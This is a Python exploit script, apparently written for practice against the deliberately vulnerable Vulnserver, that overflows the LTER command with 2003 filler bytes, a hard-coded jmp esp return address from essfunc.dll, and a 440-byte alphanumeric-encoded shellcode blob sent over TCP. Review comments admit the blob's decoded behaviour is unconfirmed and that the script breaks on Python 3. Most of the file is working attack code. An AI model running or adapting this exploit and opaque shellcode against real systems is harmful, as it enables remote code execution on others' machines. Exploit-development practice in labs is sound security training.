Vulnserver-LTER-alphanumeric.py
import socket
from struct import pack
# Target of the test run: an RFC 1918 private address and the TCP port the
# service is reached on.
victim_host, victim_port = "10.0.0.17", 9999
# EIP overwritten after sending cyclic pattern and calculated offset - !mona findmsp
# Log data, item 17
# Address=0BADF00D
# Message= EIP contains normal pattern : 0x386f4337 (offset 2003)
# Unicode JMP ESP - !mona jmp -r esp
# Log data, item 4
# Address=62501203
# Message= 0x62501203 : jmp esp | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\john\Desktop\vulnserver-master\essfunc.dll)
# Opaque payload blob, kept byte-for-byte as published. Every byte is an ASCII
# letter or digit (440 bytes in total), matching the "alphanumeric" in the
# file name.
# NOTE(review): the "_calc" suffix suggests a calculator-launching proof of
# concept, but the generator command is not recorded here, so what the decoded
# code does cannot be confirmed from this file -- verify before trusting it.
shellcode_calc = (
    "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49"
    "\x49\x49\x49\x49\x49\x49\x49\x49\x37\x51"
    "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
    "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
    "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75"
    "\x4a\x49\x79\x6c\x48\x68\x6f\x72\x73\x30"
    "\x65\x50\x57\x70\x61\x70\x6d\x59\x79\x75"
    "\x65\x61\x4f\x30\x62\x44\x6e\x6b\x32\x70"
    "\x50\x30\x6e\x6b\x50\x52\x46\x6c\x6e\x6b"
    "\x52\x72\x46\x74\x6e\x6b\x70\x72\x74\x68"
    "\x36\x6f\x6f\x47\x53\x7a\x66\x46\x75\x61"
    "\x79\x6f\x6e\x4c\x37\x4c\x51\x71\x63\x4c"
    "\x77\x72\x76\x4c\x61\x30\x49\x51\x38\x4f"
    "\x56\x6d\x67\x71\x4a\x67\x4d\x32\x39\x62"
    "\x50\x52\x53\x67\x6e\x6b\x43\x62\x34\x50"
    "\x4e\x6b\x63\x7a\x77\x4c\x6e\x6b\x70\x4c"
    "\x32\x31\x53\x48\x69\x73\x72\x68\x65\x51"
    "\x4e\x31\x72\x71\x6c\x4b\x73\x69\x67\x50"
    "\x36\x61\x4e\x33\x4e\x6b\x53\x79\x64\x58"
    "\x6d\x33\x57\x4a\x31\x59\x4e\x6b\x66\x54"
    "\x6c\x4b\x57\x71\x48\x56\x35\x61\x4b\x4f"
    "\x4e\x4c\x6b\x71\x6a\x6f\x54\x4d\x57\x71"
    "\x78\x47\x47\x48\x69\x70\x50\x75\x69\x66"
    "\x53\x33\x63\x4d\x48\x78\x45\x6b\x43\x4d"
    "\x35\x74\x42\x55\x7a\x44\x62\x78\x6c\x4b"
    "\x50\x58\x54\x64\x53\x31\x69\x43\x53\x56"
    "\x4e\x6b\x76\x6c\x70\x4b\x6c\x4b\x71\x48"
    "\x35\x4c\x75\x51\x7a\x73\x6c\x4b\x55\x54"
    "\x4e\x6b\x37\x71\x7a\x70\x6c\x49\x33\x74"
    "\x51\x34\x44\x64\x71\x4b\x33\x6b\x73\x51"
    "\x66\x39\x43\x6a\x52\x71\x4b\x4f\x4d\x30"
    "\x71\x4f\x31\x4f\x70\x5a\x4c\x4b\x52\x32"
    "\x5a\x4b\x4e\x6d\x53\x6d\x30\x6a\x47\x71"
    "\x6c\x4d\x6e\x65\x6e\x52\x73\x30\x53\x30"
    "\x47\x70\x36\x30\x75\x38\x36\x51\x6e\x6b"
    "\x62\x4f\x4f\x77\x6b\x4f\x49\x45\x6d\x6b"
    "\x58\x70\x6d\x65\x6e\x42\x62\x76\x75\x38"
    "\x6f\x56\x4f\x65\x6d\x6d\x6f\x6d\x59\x6f"
    "\x4e\x35\x65\x6c\x77\x76\x71\x6c\x47\x7a"
    "\x6b\x30\x59\x6b\x59\x70\x42\x55\x76\x65"
    "\x4f\x4b\x73\x77\x44\x53\x64\x32\x52\x4f"
    "\x33\x5a\x57\x70\x51\x43\x4b\x4f\x4e\x35"
    "\x63\x53\x70\x61\x50\x6c\x62\x43\x74\x6e"
    "\x75\x35\x50\x78\x32\x45\x67\x70\x41\x41"
)
# Request layout: the "LTER /.:/" command prefix, 2003 filler bytes (the EIP
# offset reported by `!mona findmsp`), the 4-byte return address, then the
# payload blob.
# 0x62501203 is the `jmp esp` in essfunc.dll from the mona log; that module is
# listed with ASLR: False and Rebase: False, which is what lets a hard-coded
# address work. A build with ASLR/rebasing enabled would invalidate it.
# NOTE(review): pack('I', ...) uses native byte order, and str + pack(...) only
# concatenates on Python 2; on Python 3 pack() returns bytes and this raises
# TypeError.
exploit_payload = (
    "LTER /.:/"
    + "A" * 2003
    + pack('I', 0x62501203)
    + shellcode_calc
)
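# One exchange with the target: connect, print the banner, send the request
# held in exploit_payload, print the reply.
# Only socket-level failures are reported here; the original bare `except:`
# also hid programming errors and Ctrl-C behind the same generic message.
expl = None
try:
    expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print("[x] Setting up a IPV4 socket connection\n")
    expl.connect((victim_host, victim_port))
    print(expl.recv(1024))
    print("[x] Connected to the victim host")
    expl.send(exploit_payload)
    print(expl.recv(1024))
    print("[x] Malicious payload sent...")
except socket.error as err:
    print("[!] Error runnning exploit against target")
    # Surface the underlying reason instead of discarding it.
    print("[!] Reason: %s" % err)
finally:
    # Release the descriptor on every path; the original never closed it.
    if expl is not None:
        expl.close()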